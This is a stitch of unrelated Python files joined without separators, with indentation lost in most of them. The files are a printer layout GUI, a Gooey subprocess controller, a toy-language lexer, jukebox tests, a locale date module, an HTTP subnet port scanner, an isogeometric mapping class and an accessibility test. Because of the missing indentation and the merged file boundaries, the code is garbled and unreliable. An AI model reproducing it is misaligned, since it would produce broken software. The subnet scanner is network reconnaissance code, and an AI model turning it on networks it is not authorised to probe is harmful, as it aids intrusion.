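# saveLayout writes and openLayout reads. Hypothetical example:
#
#   [image]
#   filename=logo.png
#   left=42.0
#   bottom=17.5
#   width=30.0
#   height=20.0
#   lastResized=1424000000.0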
def closeLayout(self):
if len(self.images) == 1:
self.layout = None
self.layoutChanged = False
self.update()
return True
if self.layoutChanged:
answer = QtGui.QMessageBox.question(self, "Unsaved Changes",
"Would you like to save the current layout?",
(QtGui.QMessageBox.Save |
QtGui.QMessageBox.Discard |
QtGui.QMessageBox.Cancel))
if answer == QtGui.QMessageBox.Save:
if not self.saveLayout():
return False
elif answer == QtGui.QMessageBox.Cancel:
return False
self.images = [self.printHeadImage]
self.layout = None
self.layoutChanged = False
self.update()
return True
def checkImageChanges(self):
if self.printThread != None:
return
changed = []
for image in self.images:
if image == self.printHeadImage:
continue
modified = os.path.getmtime(image.filename)
if modified > image.lastLoaded and modified > self.lastCheckForChanges:
changed.append(image)
self.lastCheckForChanges = time.time()
if len(changed) == 0:
return
mb = QtGui.QMessageBox(QtGui.QMessageBox.Question,
"Outside Changes",
"One or more image files have been changed by an outside editor. Would you like to reload these images?\n\nWARNING: any modification you have made to the changed image(s) will be lost.",
(QtGui.QMessageBox.Yes |
QtGui.QMessageBox.No), self)
mb.setDetailedText("Changed files:\n{}".format('\n'.join(image.filename for image in changed)))
answer = mb.exec_()
if answer == QtGui.QMessageBox.No:
return
for image in changed:
image.pixmap = self.pixmapFromFilename(image.filename)
self.update()
def showImageListTriggered(self):
if self.argentum.showImageListAction.isChecked():
self.imageList.update()
self.imageList.show()
else:
self.imageList.hide()
# A kind of annoying Rect
# Note: (0,0) is the bottom left corner of the printer
# All measurements are in millimeters
class PrintRect:
def __init__(self, left, bottom, width, height):
self.left = float(left)
self.bottom = float(bottom)
self.width = float(width)
self.height = float(height)
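# Example: PrintView's print area is PrintRect(24, 73, 247, 127), i.e. a
# region 247 mm wide and 127 mm tall whose lower-left corner sits 24 mm
# right of and 73 mm above the printer's origin.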
class PrintImage(PrintRect):
def __init__(self, pixmap, filename):
self.pixmap = pixmap
self.filename = filename
self.left = 0.0
self.bottom = 0.0
self.width = pixmap.width() / imageScale[0]
self.height = pixmap.height() / imageScale[1]
self.lastLoaded = time.time()
self.lastResized = None
self.screenRect = None
self.visible = True
filename = os.path.basename(filename)
if filename.find('.') != -1:
filename = filename[:filename.find('.')]
self.hexFilename = filename + ".hex"
def pixmapRect(self):
return QtCore.QRectF(self.pixmap.rect())
class PrintCanceledException(Exception):
pass
class PrintOptionsDialog(QtGui.QDialog):
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self.setWindowTitle("Print Options")
mainLayout = QtGui.QVBoxLayout()
self.printView = parent
self.argentum = parent.argentum
layout = QtGui.QHBoxLayout()
layout.addWidget(QtGui.QLabel("Print each image"))
self.passes = QtGui.QSpinBox(self)
self.passes.setMinimum(1)
layout.addWidget(self.passes)
layout.addWidget(QtGui.QLabel("times"))
mainLayout.addLayout(layout)
self.useRollers = QtGui.QCheckBox("Dry the print after each pass")
self.useRollers.setChecked(self.argentum.getOption("use_rollers", False))
mainLayout.addWidget(self.useRollers)
self.alsoPause = QtGui.QCheckBox("Pause after each pass")
self.alsoPause.setChecked(self.argentum.getOption("also_pause", True))
mainLayout.addWidget(self.alsoPause)
layout = QtGui.QHBoxLayout()
cancelButton = QtGui.QPushButton("Cancel")
cancelButton.clicked.connect(self.reject)
layout.addWidget(cancelButton)
printButton = QtGui.QPushButton("Print")
printButton.clicked.connect(self.accept)
layout.addWidget(printButton)
mainLayout.addLayout(layout)
printButton.setDefault(True)
self.setLayout(mainLayout)
def getPasses(self):
return self.passes.value()
def getUseRollers(self):
return self.useRollers.isChecked()
def getAlsoPause(self):
return self.alsoPause.isChecked()
class PrintProgressDialog(QtGui.QDialog):
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self.printView = parent
mainLayout = QtGui.QVBoxLayout()
self.label = QtGui.QLabel("")
self.label.setAlignment(QtCore.Qt.AlignHCenter)
mainLayout.addWidget(self.label)
self.progressBar = QtGui.QProgressBar(self)
self.progressBar.setOrientation(QtCore.Qt.Horizontal)
mainLayout.addWidget(self.progressBar)
layout = QtGui.QHBoxLayout()
self.pauseButton = QtGui.QPushButton("Pause")
self.pauseButton.clicked.connect(self.pause)
layout.addWidget(self.pauseButton)
self.cancelButton = QtGui.QPushButton("Cancel")
self.cancelButton.clicked.connect(self.cancel)
layout.addWidget(self.cancelButton)
mainLayout.addLayout(layout)
self.cancelButton.setDefault(True)
self.setLayout(mainLayout)
self.paused = False
self.canceled = False
def wasCanceled(self):
return self.canceled
def setLabelText(self, text):
if text.startswith("Pass "):
self.setWindowTitle("Printing ({})".format(text[:text.find(':')]))
self.label.setText(text)
def setValue(self, value):
self.progressBar.setValue(value)
if value == 100:
self.hide()
def cancel(self):
self.canceled = True
def pause(self):
if self.paused:
self.paused = False
self.pauseButton.setText("Pause")
else:
self.paused = True
self.pauseButton.setText("Resume")
def closeEvent(self, e):
self.cancel()
class RateYourPrintDialog(QtGui.QDialog):
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self.setWindowTitle("Rate Your Print")
mainLayout = QtGui.QVBoxLayout()
self.argentum = parent.argentum
info = QtGui.QLabel("How was your print?")
mainLayout.addWidget(info)
mainLayout.addWidget(QtGui.QLabel(" "))
layout = QtGui.QHBoxLayout()
for n in range(1, 6):
label = QtGui.QLabel(str(n))
if n == 1:
label.setAlignment(QtCore.Qt.AlignLeft)
if n == 2:
label.setAlignment(QtCore.Qt.AlignLeft)
layout.addSpacing(45)
if n == 3:
label.setAlignment(QtCore.Qt.AlignHCenter)
if n == 4:
label.setAlignment(QtCore.Qt.AlignRight)
if n == 5:
layout.addSpacing(45)
label.setAlignment(QtCore.Qt.AlignRight)
layout.addWidget(label)
mainLayout.addLayout(layout)
self.slider = QtGui.QSlider(QtCore.Qt.Horizontal, self)
self.slider.setRange(1, 5)
self.slider.setValue(3)
self.slider.setTickInterval(1)
self.slider.setTickPosition(self.slider.TicksAbove)
mainLayout.addWidget(self.slider)
mainLayout.addWidget(QtGui.QLabel(" "))
info = QtGui.QLabel("Your feedback is important. Please let us know how we can make your print better.")
mainLayout.addWidget(info)
self.comments = QtGui.QTextEdit(self)
mainLayout.addWidget(self.comments)
layout = QtGui.QHBoxLayout()
info = QtGui.QLabel("Your printer number:")
layout.addWidget(info)
self.printerNum = QtGui.QLineEdit(self)
if self.argentum.getPrinterNumber():
self.printerNum.setText(self.argentum.getPrinterNumber())
layout.addWidget(self.printerNum)
self.printerNum.setToolTip("Look on the back of your printer.")
mainLayout.addLayout(layout)
self.wantContact = QtGui.QCheckBox("Contact me about this print")
self.wantContact.stateChanged.connect(self.contactMe)
mainLayout.addWidget(self.wantContact)
self.emailLayout = None
self.email = None
layout = QtGui.QHBoxLayout()
cancelButton = QtGui.QPushButton("Cancel")
cancelButton.clicked.connect(self.reject)
layout.addWidget(cancelButton)
self.sendButton = QtGui.QPushButton("Send Report")
self.sendButton.clicked.connect(self.sendReport)
layout.addWidget(self.sendButton)
mainLayout.addLayout(layout)
self.sendButton.setDefault(True)
self.setLayout(mainLayout)
def contactMe(self, state):
mainLayout = self.layout()
if state == QtCore.Qt.Unchecked:
if self.emailLayout:
mainLayout.removeItem(self.emailLayout)
self.yourEmailInfo.deleteLater()
self.email.deleteLater()
self.emailLayout.deleteLater()
self.yourEmailInfo = None
self.email = None
self.emailLayout = None
else:
self.emailLayout = QtGui.QHBoxLayout()
self.yourEmailInfo = QtGui.QLabel("Your email:")
self.emailLayout.addWidget(self.yourEmailInfo)
self.email = QtGui.QLineEdit(self)
if self.argentum.getEmail():
self.email.setText(self.argentum.getEmail())
self.emailLayout.addWidget(self.email)
mainLayout.insertLayout(mainLayout.count() - 1, self.emailLayout)
self.update()
def sendLoop(self):
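        # Gather the report fields and POST them to the feedback endpoint.
        # This runs on a worker thread (see sendReport) so the dialog can
        # close without waiting on the network.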
firmware = ""
        if self.argentum.printer is not None:
firmware = self.argentum.printer.version
data = {"rate": self.rate,
"comments": self.commentText,
"installnum": self.argentum.getInstallNumber(),
"printernum": self.printerNumText,
"email": self.emailText,
"ts_processing_images": self.argentum.getTimeSpentProcessingImages(),
"ts_sending_files": self.argentum.getTimeSpentSendingFiles(),
"ts_printing": self.argentum.getTimeSpentPrinting(),
"version": BASEVERSION,
"firmware": firmware
}
r = requests.post("https://connect.cartesianco.com/feedback/print.php", data=data, verify=CA_CERTS)
print(r.text)
def sendReport(self):
self.sendButton.setText("Sending...")
self.printerNumText = str(self.printerNum.text())
self.emailText = ""
if self.email:
self.emailText = str(self.email.text())
if self.printerNumText != "":
self.argentum.setPrinterNumber(self.printerNumText)
if self.emailText != "" and self.emailText != self.argentum.getEmail():
self.argentum.setEmail(self.emailText)
self.rate = self.slider.sliderPosition()
self.commentText = str(self.comments.toPlainText())
updateThread = threading.Thread(target=self.sendLoop)
updateThread.start()
self.accept()
class ImageList(QtGui.QDialog):
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self.parent = parent
self.setWindowTitle("Image List")
mainLayout = QtGui.QVBoxLayout()
self.imageList = QtGui.QListWidget(self)
self.imageList.setSelectionMode(QtGui.QAbstractItemView.NoSelection)
self.imageList.itemClicked.connect(self.itemClicked)
self.imageList.itemEntered.connect(self.itemEntered)
mainLayout.addWidget(self.imageList)
self.setLayout(mainLayout)
self.visibleIcon = QtGui.QIcon("visible.png")
self.notVisibleIcon = QtGui.QIcon("notvisible.png")
def update(self):
self.imageList.clear()
for image in self.parent.images:
if image == self.parent.printHeadImage:
continue
item = QtGui.QListWidgetItem(self.visibleIcon, os.path.basename(image.filename))
item.setData(QtCore.Qt.UserRole, image)
self.imageList.addItem(item)
QtGui.QDialog.update(self)
def itemClicked(self, item):
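        # Clicking an item toggles the visibility of the image it wraps;
        # the current icon is identified by its serial number (Qt4 API).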
if item.icon().serialNumber() == self.visibleIcon.serialNumber():
item.setIcon(self.notVisibleIcon)
item.data(QtCore.Qt.UserRole).toPyObject().visible = False
else:
item.setIcon(self.visibleIcon)
item.data(QtCore.Qt.UserRole).toPyObject().visible = True
self.parent.update()
def itemEntered(self, item):
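        # Entering the item adjacent to the currently selected one swaps
        # the two images in the parent's list, giving drag-to-reorder.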
if self.imageList.currentItem() and self.imageList.currentItem() != item:
curImage = self.imageList.currentItem().data(QtCore.Qt.UserRole).toPyObject()
enterImage = item.data(QtCore.Qt.UserRole).toPyObject()
curImageIdx = self.parent.images.index(curImage)
enterImageIdx = self.parent.images.index(enterImage)
if enterImageIdx == curImageIdx + 1:
images = self.parent.images[:curImageIdx]
images.append(enterImage)
images.append(curImage)
if enterImageIdx + 1 != len(self.parent.images):
images.extend(self.parent.images[enterImageIdx+1:])
self.parent.images = images
self.parent.update()
self.update()
elif enterImageIdx == curImageIdx - 1:
images = self.parent.images[:enterImageIdx]
images.append(curImage)
images.append(enterImage)
if curImageIdx + 1 != len(self.parent.images):
images.extend(self.parent.images[curImageIdx+1:])
self.parent.images = images
self.parent.update()
self.update()
def closeEvent(self, e):
self.parent.argentum.showImageListAction.setChecked(False)
import os
import re
import subprocess
from functools import partial
from multiprocessing.dummy import Pool
import sys
from gooey.gui.pubsub import pub
from gooey.gui.util.casting import safe_float
from gooey.gui.util.functional import unit, bind
from gooey.gui.util.taskkill import taskkill
class ProcessController(object):
def __init__(self, progress_regex, progress_expr):
self._process = None
self.progress_regex = progress_regex
self.progress_expr = progress_expr
def was_success(self):
self._process.communicate()
return self._process.returncode == 0
    def poll(self):
        if not self._process:
            raise Exception('Not started!')
        return self._process.poll()
def stop(self):
if self.running():
taskkill(self._process.pid)
def running(self):
return self._process and self.poll() is None
def run(self, command):
env = os.environ.copy()
env["GOOEY"] = "1"
self._process = subprocess.Popen(
command.encode(sys.getfilesystemencoding()),
bufsize=1, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, shell=True, env=env)
Pool(1).apply_async(self._forward_stdout, (self._process,))
def _forward_stdout(self, process):
'''
Reads the stdout of `process` and forwards lines and progress
to any interested subscribers
'''
while True:
line = process.stdout.readline()
if not line:
break
pub.send_message('console_update', msg=line)
pub.send_message('progress_update', progress=self._extract_progress(line))
pub.send_message('execution_complete')
def _extract_progress(self, text):
'''
Finds progress information in the text using the
user-supplied regex and calculation instructions
'''
# monad-ish dispatch to avoid the if/else soup
find = partial(re.search, string=text.strip())
regex = unit(self.progress_regex)
match = bind(regex, find)
result = bind(match, self._calculate_progress)
return result
def _calculate_progress(self, match):
'''
Calculates the final progress value found by the regex
'''
if not self.progress_expr:
return safe_float(match.group(1))
else:
return self._eval_progress(match)
def _eval_progress(self, match):
'''
Runs the user-supplied progress calculation rule
'''
_locals = {k: safe_float(v) for k, v in match.groupdict().items()}
if "x" not in _locals:
_locals["x"] = [safe_float(x) for x in match.groups()]
try:
return int(eval(self.progress_expr, {}, _locals))
except:
return None
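
# A minimal usage sketch (not part of Gooey itself; the command, regex and
# expression are illustrative assumptions). The regex captures two numbers
# from lines such as "progress 3/10" and the expression turns them into a
# percentage.
if __name__ == '__main__':
    controller = ProcessController(
        progress_regex=r'progress (\d+)/(\d+)',
        progress_expr='x[0] / x[1] * 100')
    controller.run(u'python -u worker.py')  # hypothetical worker script
    print('success' if controller.was_success() else 'failed')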
# lexer.py
#
# author: Christopher S. Corley
from swindle.lexeme import Lexeme
from swindle.types import (Types, get_type, PUNCTUATION)
from io import TextIOWrapper
class Lexer:
def __init__(self, fileptr):
# fileptr is generally a TextIOWrapper when reading from a file
self.fileptr = fileptr
self.done = False
self.comment_mode = False
self.need_terminator = False
# To emulate pushing things back to the stream
self.saved_char = None
        # character is a generator so we can read the input one character
        # at a time with next(self.character)
self.character = self.char_generator()
# line_no and col_no have special properties because we always want
# line 0 to be line 1.
@property
def line_no(self):
return self._line_no
@line_no.setter
def line_no(self, val):
self._line_no = val + 1
@property
def col_no(self):
return self._col_no
@col_no.setter
def col_no(self, val):
self._col_no = val + 1
def make_error(self, msg):
if type(self.fileptr) is TextIOWrapper:
exception_str = str(self.fileptr.name) + "\n"
else:
exception_str = str(type(self.fileptr)) + "\n\t"
exception_str += str(self.fileptr) + "\n"
exception_str += "Error on line " + str(self.line_no)
exception_str += ", character " + str(self.col_no)
exception_str += ": \n\t" + str(msg)
raise Exception(exception_str)
# a convenient way to count line numbers and read things character
# by character.
def char_generator(self):
for self.line_no, line in enumerate(self.fileptr):
for self.col_no, char in enumerate(line):
self.saved_char = None
yield char
    # Returning None represents an EOF marker and also makes looping
    # easy, since loops stop on None or False.
def get_next_char(self):
if self.saved_char:
c = self.saved_char
self.saved_char = None
else:
try:
c = next(self.character)
except StopIteration:
self.done = True
return None
return c
def skip_whitespace(self):
# skip_whitespace will do just that, but in swindle we need the
# extra property of tokenizing the whitespace at the beginning
# of a line as well. So, this will either return a whitespace
# Lexeme or None.
c = self.get_next_char()
while c:
if self.comment_mode:
if c == '\n':
self.comment_mode = False
if self.need_terminator:
self.need_terminator = False
return Lexeme(c,
self.line_no,
self.col_no)
elif c == '#':
self.comment_mode = True
elif c == ' ':
pass
elif c == '\n':
# begin tokenizing whitespace for indent
self.comment_mode = False
if self.need_terminator:
self.need_terminator = False
return Lexeme(c,
self.line_no,
self.col_no)
else:
self.saved_char = c
return None
c = self.get_next_char()
return None
# Will return None if there are no characters left.
def lex(self):
ws_token = self.skip_whitespace()
if ws_token:
return ws_token
c = self.get_next_char()
if c:
if ( c == '('
or c == ')'
or c == ':'
or c == '`'
or c == '.'
or c == '['
or c == ']'):
self.need_terminator = True
return Lexeme(c, self.line_no, self.col_no)
elif c.isdigit():
self.saved_char = c
self.need_terminator = True
return self.lex_number()
elif c.isalpha():
self.saved_char = c
self.need_terminator = True
return self.lex_id_or_keyword()
elif c == '"':
self.saved_char = c
self.need_terminator = True
return self.lex_string()
            else:
                raise Exception("Unknown token found")
return None
    def lex_number(self):
        # we already know the saved_char contains the first digit of
        # the number, so get it back off again.
        cstr = self.get_next_char()
        c = self.get_next_char()
        while c and c.isdigit():
            cstr += c
            c = self.get_next_char()
        if c and (c not in PUNCTUATION
                  and c != ' '
                  and c != '\n'):
            self.make_error("Variable names must begin with a letter.")
        self.saved_char = c
        return Lexeme(cstr, self.line_no, self.col_no)
def lex_id_or_keyword(self):
# we already know the saved_char contains the first letter of
# the id or keyword, so get it back off again.
cstr = self.get_next_char()
c = self.get_next_char()
while c and (c.isalpha()
or c.isdigit()
or c == "_"
# for the set! keyword
or c == "!"):
cstr += c
c = self.get_next_char()
if c and (c not in PUNCTUATION
and c != ' '
and c != '\n'):
self.make_error("Variable names cannot contain character " + c)
self.saved_char = c
return Lexeme(cstr, self.line_no, self.col_no)
def lex_string(self):
cstr = self.get_next_char() # if we want to collect beginning "
# which we do, because we want to have an easy way for Lexeme
# to detect the string literal
c = self.get_next_char()
while c:
if c == '\\':
# this will allow us to grab any escaped character
cstr += c
c = self.get_next_char()
elif c == '"':
cstr += c # if we want to collect ending "
return Lexeme(cstr, self.line_no, self.col_no)
cstr += c
c = self.get_next_char()
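
# A minimal driving sketch (assumes swindle.lexeme.Lexeme has a readable
# repr): feed the lexer an in-memory program and pull tokens until EOF.
if __name__ == '__main__':
    import io
    lexer = Lexer(io.StringIO(u'define x: 42\n'))
    while not lexer.done:
        token = lexer.lex()
        if token is None:
            break
        print(token)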
import mock
import twisted.web.server
import jukebox.httpd
def test_stream_get():
request = mock.Mock(name='request')
source = mock.Mock(name='source', spec=jukebox.httpd.Source)
Client = mock.Mock(name='Client')
stream = jukebox.httpd.Stream(source, Client)
result = stream.render_GET(request)
assert twisted.web.server.NOT_DONE_YET == result
Client.assert_called_with(request)
source.add_client.assert_called_with(Client.return_value)
def test_client_init():
request = mock.Mock(name='request')
jukebox.httpd.Client(request)
request.setHeader.assert_called_with('Content-Type', 'audio/mpeg')
def test_client_send():
request = mock.Mock(name='request')
client = jukebox.httpd.Client(request)
client.send('foo')
request.write.assert_called_with('foo')
def test_source_init_start_song_callback():
playlist = mock.Mock(name='playlist', cur=None)
encoder = mock.Mock(name='encoder')
source = jukebox.httpd.Source(playlist, encoder)
playlist.add_listener.assert_called_with(source.start_new_song)
def test_add_client_send():
playlist = mock.Mock(name='playlist', cur=None)
encoder = mock.Mock(name='encoder')
source = jukebox.httpd.Source(playlist, encoder)
client = mock.Mock(name='client')
source.add_client(client)
source.send('foo')
client.send.assert_called_with('foo')
def test_source_new_song():
playlist = mock.Mock(name='playlist')
encoder = mock.Mock(name='encoder')
source = jukebox.httpd.Source(playlist, encoder)
source.start_new_song('NEW_CUR')
encoder.assert_called_with(
song=playlist.cur,
data_callback=source.send,
)
    assert encoder.return_value.encode.called
def test_source_not_new_song():
playlist = mock.Mock(name='playlist')
encoder = mock.Mock(name='encoder')
source = jukebox.httpd.Source(playlist, encoder)
source.start_new_song('FOO')
assert not encoder.called
def test_source_new_song_empty_playlist():
playlist = mock.Mock(name='playlist', cur=None)
encoder = mock.Mock(name='encoder')
source = jukebox.httpd.Source(playlist, encoder)
source.start_new_song('NEW_CUR')
assert not encoder.called
""" Locale dependant formatting and parsing.
XXX This module still has prototype status and is undocumented.
XXX Check the spelling.
XXX Check the string format.
Copyright (c) 1998-2000, Marc-Andre Lemburg; mailto:[email protected]
Copyright (c) 2000-2001, eGenix.com Software GmbH; mailto:[email protected]
See the documentation for further information on copyrights,
or contact the author. All Rights Reserved.
"""
def _make_dict(*names):
""" Helper to create a dictionary mapping indices to
names and names to indices.
"""
d = {}
for i in range(len(names)):
d[names[i]] = i
d[i] = names[i]
return d
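# For example, _make_dict('Mon', 'Tue') returns
# {'Mon': 0, 'Tue': 1, 0: 'Mon', 1: 'Tue'}.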
class _TimeLocale:
""" Base class for locale dependend formatting and parsing.
"""
# Examples:
Weekday = _make_dict('Monday','Tuesday','Wednesday','Thursday','Friday',
'Saturday','Sunday')
Month = _make_dict(None,
'January','February','March','April','May','June',
'July','August','September','October','November','December')
# Instance variables
MonthNames = ()
WeekdayNames = ()
def __init__(self):
""" Init. the instance variables.
"""
l = []
for i in range(1,13):
l.append(self.Month[i])
self.MonthNames = tuple(l)
l = []
for i in range(7):
l.append(self.Weekday[i])
self.WeekdayNames = tuple(l)
def str(self,d):
"""str(datetime)
Return the given DateTime instance formatted according to
the locale's convention. Timezone information is not
presented.
"""
return '%s %02i %s %04i %02i:%02i:%02i' % (
self.Weekday[d.day_of_week],
d.day,self.Month[d.month],d.year,
d.hour,d.minute,d.second)
# Alias
ctime = str
# Singletons that implement the specific methods.
class English(_TimeLocale):
Weekday = _make_dict('Monday','Tuesday','Wednesday','Thursday','Friday',
'Saturday','Sunday')
Month = _make_dict(None,
'January','February','March','April','May','June',
'July','August','September','October','November','December')
English = English()
class German(_TimeLocale):
Weekday = _make_dict('Montag','Dienstag','Mittwoch','Donnerstag',
'Freitag','Samstag','Sonntag')
Month = _make_dict(None,
'Januar','Februar','März','April','Mai','Juni',
'Juli','August','September','Oktober','November','Dezember')
German = German()
class French(_TimeLocale):
Weekday = _make_dict('lundi','mardi','mercredi','jeudi',
'vendredi','samedi','dimanche')
Month = _make_dict(None,
'janvier','février','mars','avril','mai','juin',
'juillet','août','septembre','octobre','novembre','décembre')
French = French()
class Spanish(_TimeLocale):
    Weekday = _make_dict('lunes','martes','miércoles','jueves','viernes',
        'sábado','domingo')
Month = _make_dict(None,
'enero','febrero','marzo','abril','mayo','junio',
'julio','agosto','septiembre','octubre','noviembre','diciembre')
Spanish = Spanish()
class Portuguese(_TimeLocale):
    Weekday = _make_dict('segunda-feira','terça-feira','quarta-feira',
        'quinta-feira','sexta-feira','sábado','domingo')
    Month = _make_dict(None,
        'janeiro','fevereiro','março','abril','maio','junho',
        'julho','agosto','setembro','outubro','novembro','dezembro')
Portuguese = Portuguese()
###
def _test():
import DateTime
d = DateTime.now()
for lang in (English,German,French,Spanish,Portuguese):
print lang.__class__.__name__,':',lang.ctime(d)
if __name__ == '__main__':
_test()
import socket
import requests
from lxml.html import fromstring
import datetime
import sys
import ipaddress
import threading
import os
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[1;94m', '\033[1;91m', '\33[1;97m', '\33[1;93m', '\033[1;35m', '\033[1;32m', '\033[0m'
class ThreadManager(object):
i = 0
def __init__(self, ipList):
self.allIps = ipList
self.size = len(ipList)
    def getNextIp(self):
        # Hand out every IP in the list, including the last one.
        if self.i < self.size:
            ip = self.allIps[self.i]
            self.i += 1
            return ip
        return 0
def getID(self):
return self.i + 1
def coreOptions():
options = [["network", "IP range to scan", ""], ["port-timeout", "Timeout (in sec) for port 80.", "0.3"],
["title-timeout", "Timeout (in sec) for title resolve.", "3"], ["threads", "Number of threads to run.", "50"],
["verbose", "Show verbose output.", "true"]]
return options
def createIPList(network):
net4 = ipaddress.ip_network(network)
ipList = []
for x in net4.hosts():
ipList.append(x)
return ipList
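# For example, createIPList("192.168.0.0/30") returns the two usable host
# addresses 192.168.0.1 and 192.168.0.2; .hosts() excludes the network and
# broadcast addresses.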
def print1(data):
if verbose:
print("\033[K" + data)
def checkServer(address, port):
s = socket.socket()
s.settimeout(float(portTimeout))
try:
s.connect((address, port))
s.close()
return True
except socket.error:
s.close()
return False
except:
s.close()
return "FAIL"
def getHTTP(address, port):
code = None
title = None
try:
r = requests.get("http://" + address, timeout=float(titleTimeout), allow_redirects=True)
except:
return False
try:
code = r.status_code
except:
pass
try:
tree = fromstring(r.content)
title = tree.findtext('.//title')
except:
pass
return [title, code]
def writeToFile(line):
file = open(fileName, "a")
file.write(line)
file.close()
def restart_line():
sys.stdout.write('\r')
sys.stdout.flush()
def statusWidget():
sys.stdout.write(GREEN + "[" + status + "] " + YELLOW + str(threadManager.getID()) + GREEN + " / " + YELLOW + str(
allIPs) + GREEN + " hosts done." + END)
restart_line()
sys.stdout.flush()
def scan(i):
global status
global openPorts
global done
while True:
if stop:
sys.exit()
ip = threadManager.getNextIp()
if ip == 0:
break
status = (threadManager.getID() / allIPs) * 100
status = format(round(status, 2))
status = str(status) + "%"
stringIP = str(ip)
isUp = checkServer(stringIP, port)
if isUp != "FAIL":
if isUp:
openPorts = openPorts + 1
print1(GREEN + "[+] Port 80 is open on '" + stringIP + "'" + END)
http = getHTTP(stringIP, 80)
if not http:
print1(YELLOW + "[!] Failed to get the HTTP response of '" + stringIP + "'" + END)
title = "NO-TITLE"
code = "NO-CODE"
else:
title = str(http[0])
code = str(http[1])
if code is not None:
print1(GREEN + "[+] Response code of '" + stringIP + "': '" + code + "'" + END)
else:
print1(YELLOW + "[!] Failed to get the response code of '" + stringIP + "'" + YELLOW)
code = "NO-CODE"
if title is not None:
title = title.replace("\n", "")
try:
print1(GREEN + "[+] Title of '" + stringIP + "': '" + title + "'" + END)
except:
print1(YELLOW + "[!] Failed to print title of '" + stringIP + "'" + END)
title = "NO-TITLE"
else:
print1(YELLOW + "[!] Failed to get title of '" + stringIP + "'" + YELLOW)
title = "NO-TITLE"
logLine = stringIP + " - " + "80 OPEN" + " - " + code + " - " + title + "\n"
logLines.append(logLine)
elif not isUp:
print1(RED + "[-] Port 80 is closed on '" + stringIP + "'" + END)
else:
print1(RED + "[!] Failed connecting to '" + stringIP + "'" + END)
done = done + 1
def core(moduleOptions):
print(
"\n" + GREEN + "HTTP module by @xdavidhu. Scanning subnet '" + YELLOW + moduleOptions[0][2] + GREEN + "'...\n")
global status
global fileName
global allIPs
global portTimeout
global titleTimeout
global ips
global threadCount
global done
global verbose
global stop
global port
global openPorts
global logLines
global threadManager
logLines = []
stop = False
done = 0
portTimeout = moduleOptions[1][2]
titleTimeout = moduleOptions[2][2]
network = moduleOptions[0][2]
threadCount = int(moduleOptions[3][2])
verbose = moduleOptions[4][2]
if verbose == "true":
verbose = True
else:
verbose = False
try:
ipList = createIPList(network)
allIPs = len(ipList)
if allIPs == 0:
raise Exception
except:
print(RED + "[!] Invalid subnet. Exiting...\n")
return
threadManager = ThreadManager(ipList)
i = datetime.datetime.now()
i = str(i).replace(" ", "_")
i = str(i).replace(":", "-")
script_path = os.path.dirname(os.path.realpath(__file__))
script_path = script_path.replace("modules", "")
if not os.path.exists(script_path + "logs"):
os.makedirs(script_path + "logs")
fileName = script_path + "logs/log-http-portSpider-" + i + ".log"
file = open(fileName, 'w')
file.write("subnet: " + network + "\n")
file.close()
port = 80
openPorts = 0
threads = []
    for i in range(threadCount):
        t = threading.Thread(target=scan, args=(i,))
t.daemon = True
threads.append(t)
t.start()
try:
while True:
            if done == threadCount:
                break
statusWidget()
    except KeyboardInterrupt:
        print("\n" + RED + "[I] Stopping..." + END)
    stop = True
    verbose = False
for logLine in logLines:
try:
writeToFile(logLine)
except:
writeToFile("WRITING-ERROR")
print("\n\n" + GREEN + "[I] HTTP module done. Results saved to '" + YELLOW + fileName + GREEN + "'.\n")
"""
Reference mappings for isogeometric analysis.
"""
import numpy as nm
from sfepy.discrete.common.mappings import Mapping
from sfepy.discrete.common.extmods.mappings import CMapping
import sfepy.discrete.iga.extmods.igac as iga
class IGMapping(Mapping):
"""
Reference mapping for isogeometric analysis based on Bezier extraction.
Parameters
----------
domain : IGDomain instance
The mapping domain.
cells : array
The mapping region cells. (All domain cells required.)
nurbs : NurbsPatch instance, optional
If given, the `nurbs` is used instead of `domain.nurbs`. The `nurbs`
has to be obtained by degree elevation of `domain.nurbs`.
"""
def __init__(self, domain, cells, nurbs=None):
self.domain = domain
self.cells = cells
self.nurbs = domain.nurbs if nurbs is None else nurbs
self.v_shape = (len(cells), -1, self.domain.shape.dim)
self.s_shape = (len(cells), -1, 1)
def get_geometry(self):
"""
Return reference element geometry as a GeometryElement instance.
"""
return self.domain.gel
def get_physical_qps(self, qp_coors):
"""
Get physical quadrature points corresponding to given reference
Bezier element quadrature points.
Returns
-------
qps : array
The physical quadrature points ordered element by element,
i.e. with shape (n_el, n_qp, dim).
"""
nurbs = self.nurbs
variable = nm.ones((nurbs.weights.shape[0], 1), dtype=nm.float64)
qps, _, _ = iga.eval_variable_in_qp(variable, qp_coors, nurbs.cps,
nurbs.weights, nurbs.degrees,
nurbs.cs, nurbs.conn, self.cells)
qps = qps.reshape(self.v_shape)
return qps
def get_mapping(self, qp_coors, weights):
"""
Get the mapping for given quadrature points and weights.
Returns
-------
cmap : CMapping instance
The reference mapping.
Notes
-----
Does not set total volume of the C mapping structure!
"""
nurbs = self.nurbs
bfs, bfgs, dets = iga.eval_mapping_data_in_qp(qp_coors, nurbs.cps,
nurbs.weights,
nurbs.degrees, nurbs.cs,
nurbs.conn, self.cells)
# Weight Jacobians by quadrature point weights.
dets = nm.abs(dets) * weights[None, :, None, None]
# Cell volumes.
volumes = dets.sum(axis=1)[..., None]
cmap = CMapping(self.v_shape[0], qp_coors.shape[0], self.v_shape[2],
bfs.shape[3], mode='volume', flag=1)
cmap.bf[:] = bfs
cmap.bfg[:] = bfgs
cmap.det[:] = dets
cmap.volume[:] = volumes
return cmap
#!/usr/bin/python
"""Test of label guess for bugzilla's advanced search page."""
from macaroon.playback import *
import utils
sequence = MacroSequence()
#sequence.append(WaitForDocLoad())
sequence.append(PauseAction(5000))
# Work around some new quirk in Gecko that causes this test to fail if
# run via the test harness rather than manually.
sequence.append(KeyComboAction("<Control>r"))
sequence.append(PauseAction(3000))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("<Shift>ISO_Left_Tab"))
sequence.append(utils.AssertPresentationAction(
"1. Shift Tab",
["BRAILLE LINE: ' $l'",
" VISIBLE: ' $l', cursor=1",
"BRAILLE LINE: 'Summary: contains all of the words/strings combo box'",
" VISIBLE: 'Summary: contains all of the wor', cursor=10",
"SPEECH OUTPUT: 'Summary: contains all of the words/strings combo box.'"]))
sequence.append(utils.StartRecordingAction())
